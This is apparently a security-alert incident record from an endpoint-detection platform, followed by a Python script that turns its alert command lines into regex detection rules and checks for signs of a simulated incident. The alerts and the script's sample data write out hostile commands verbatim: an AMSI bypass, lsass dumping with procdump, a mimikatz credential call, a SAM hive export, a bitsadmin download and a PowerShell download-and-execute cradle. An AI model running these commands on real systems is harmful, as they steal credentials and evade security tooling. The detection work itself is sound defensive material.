
Incident Overview

Incident ID CINC-20251220-06654C0C
Severity Critical (90)
Status new
Alert Count 9
Host Count 1

Timeline

First Seen 2025-12-18 11:36:30
Last Seen 2025-12-18 11:41:53
Duration 0d 0h 5m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Kill chain phases: Reconnaissance, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact (the phases seen in this incident are listed under Observed Tactics below)

Observed Tactics: Execution, Credential Access, AI Powered IOA, Persistence, Defense Evasion
Techniques: PowerShell, OS Credential Dumping, Command and Scripting Interpreter, Event Triggered Execution, BITS Jobs, User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (9)

Columns: Severity, Status, Hostname, Tactic, Time, Description, Command Line (alerts listed newest first)

Alert 1
Severity High
Status new
Hostname TEAHEE
Tactic Execution
Time 12-18 11:41
Description A PowerShell script attempted to bypass Microsoft's Antimalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script.
Command Line powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"

Alert 2
Severity High
Status new
Hostname TEAHEE
Tactic Credential Access
Time 12-18 11:41
Description An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree.
Command Line C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp"

Alert 3
Severity High
Status new
Hostname TEAHEE
Tactic Credential Access
Time 12-18 11:41
Description A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further.
Command Line C:\WINDOWS\system32\cmd.exe /c "powershell -c "sekurlsa::logonpasswords""

Alert 4
Severity High
Status new
Hostname TEAHEE
Tactic AI Powered IOA
Time 12-18 11:37
Description A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts.
Command Line powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"

Alert 5
Severity Critical
Status new
Hostname TEAHEE
Tactic Credential Access
Time 12-18 11:37
Description A process saved the Security Account Manager (SAM) or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.
Command Line reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv

Alert 6
Severity High
Status new
Hostname TEAHEE
Tactic Persistence
Time 12-18 11:37
Description Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Review the installer package and any pre- or post-install actions.
Command Line msiexec /q /i http://127.0.0.1/test.msi

Alert 7
Severity High
Status new
Hostname TEAHEE
Tactic Defense Evasion
Time 12-18 11:37
Description A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree.
Command Line bitsadmin /transfer j http://127.0.0.1/test C:\Users\dokji\AppData\Local\Temp\bits.exe

Alert 8
Severity High
Status new
Hostname TEAHEE
Tactic Execution
Time 12-18 11:37
Description A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second-stage payloads. Review the command line.
Command Line C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')""

Alert 9
Severity Informational
Status new
Hostname TEAHEE
Tactic Execution
Time 12-18 11:36
Description A process has written a known EICAR test file. Review the files written by the triggered process.
Command Line "python" mega_incident_generator.py --rounds 2 --interval 30
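The command lines in these alerts are the classic set an analyst is expected to recognise on sight: a reflective AMSI bypass, a procdump of lsass, a mimikatz sekurlsa call, a reg save of the SAM hive, a remote MSI install, a bitsadmin download and an IEX download cradle. The following Python script is an added example (not the platform's detection logic and not part of this incident record) that re-derives the technique tags from raw process command lines with plain regular expressions, and adds the incident-level sanity check a practitioner would want here: every URL on this page points at 127.0.0.1, the earliest alert is an EICAR write by a process named mega_incident_generator.py, and those two facts together are consistent with a generated test incident rather than a live intrusion. The rule names, the ATT&CK technique IDs and the sample events are assumptions and constructions of this example; the sample events reuse the command lines shown above plus two benign rows.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass
class Hit:
    rule: str
    tactic: str
    technique: str  # ATT&CK mapping chosen for this example, not the vendor's


# Detection rules written against the command lines in the incident above.
# The AMSI rule is filed under Defense Evasion (T1562.001) here, whereas the
# vendor alert on this page files the same command under Execution.
RULES = [
    ("AMSI bypass via amsiInitFailed", "Defense Evasion", "T1562.001",
     re.compile(r"amsiutils.*amsiinitfailed", re.I | re.S)),
    ("LSASS memory dump via procdump", "Credential Access", "T1003.001",
     re.compile(r"procdump.*\blsass", re.I)),
    ("mimikatz sekurlsa::logonpasswords", "Credential Access", "T1003.001",
     re.compile(r"sekurlsa::logonpasswords", re.I)),
    ("SAM/SYSTEM/SECURITY hive export via reg save", "Credential Access", "T1003.002",
     re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b", re.I)),
    ("msiexec installing a package from a URL", "Persistence", "T1218.007",
     re.compile(r"msiexec.*\s/i\s+https?://", re.I)),
    ("bitsadmin /transfer download to disk", "Defense Evasion", "T1197",
     re.compile(r"bitsadmin.*/transfer", re.I)),
    ("PowerShell download cradle (IEX + DownloadString)", "Execution", "T1059.001",
     re.compile(r"IEX\s*\(.*DownloadString", re.I)),
]

URL_HOST = re.compile(r"https?://([^/\s:\"']+)", re.I)


def classify(cmdline: str) -> list[Hit]:
    """Return every rule that matches one process command line."""
    return [Hit(name, tactic, tid) for name, tactic, tid, rx in RULES if rx.search(cmdline)]


def _is_loopback(host: str) -> bool:
    try:
        return ip_address(host).is_loopback
    except ValueError:
        return host.lower() == "localhost"


def triage(events: list[dict]) -> dict:
    """Classify each event and add two incident-level heuristics chosen for this
    example: do all download URLs point at loopback, and does any process name
    mark itself as an incident generator. Both suggest a simulated incident."""
    hits = {e["id"]: classify(e["cmdline"]) for e in events}
    hosts = [h for e in events for h in URL_HOST.findall(e["cmdline"])]
    indicators = []
    if hosts and all(_is_loopback(h) for h in hosts):
        indicators.append("all download URLs point at loopback")
    if any("generator" in e["cmdline"].lower() for e in events):
        indicators.append("a process named *generator* appears in the chain")
    return {
        "hits": hits,
        "tactics": sorted({h.tactic for hs in hits.values() for h in hs}),
        "loopback_only": bool(hosts) and all(_is_loopback(h) for h in hosts),
        "simulation_indicators": indicators,
    }


# Constructed sample events: the incident's command lines plus two benign rows.
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": '"python" mega_incident_generator.py --rounds 2 --interval 30'},
    {"id": 2, "cmdline": 'C:\\WINDOWS\\system32\\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString(\'http://127.0.0.1/ps\')""'},
    {"id": 3, "cmdline": 'bitsadmin /transfer j http://127.0.0.1/test C:\\Users\\dokji\\AppData\\Local\\Temp\\bits.exe'},
    {"id": 4, "cmdline": 'msiexec /q /i http://127.0.0.1/test.msi'},
    {"id": 5, "cmdline": 'reg save HKLM\\SAM C:\\Users\\dokji\\AppData\\Local\\Temp\\sam.hiv'},
    {"id": 6, "cmdline": "powershell -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\""},
    {"id": 7, "cmdline": 'C:\\WINDOWS\\system32\\cmd.exe /c "powershell -c "sekurlsa::logonpasswords""'},
    {"id": 8, "cmdline": 'C:\\WINDOWS\\system32\\cmd.exe /c "procdump -ma lsass.exe C:\\Users\\dokji\\AppData\\Local\\Temp\\lsass.dmp"'},
    {"id": 9, "cmdline": 'powershell -c "Get-ChildItem C:\\Users\\dokji\\Documents"'},
    {"id": 10, "cmdline": 'reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'},
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for eid, hs in result["hits"].items():
        print(eid, [f"{h.technique} {h.rule}" for h in hs])
    print("tactics:", result["tactics"])
    print("simulation indicators:", result["simulation_indicators"])
```

Each rule is deliberately narrow so that the benign rows (a directory listing and a reg query of the Run key) produce no hits; in production these patterns would be one layer on top of parent-process and user context, since a reg save of HKLM\SAM from a backup agent and the same command from cmd.exe under an interactive user are different events. The simulation indicators are advisory: an attacker can also stage from a local listener, so they should downgrade confidence and prompt a look at the process tree rather than close the incident.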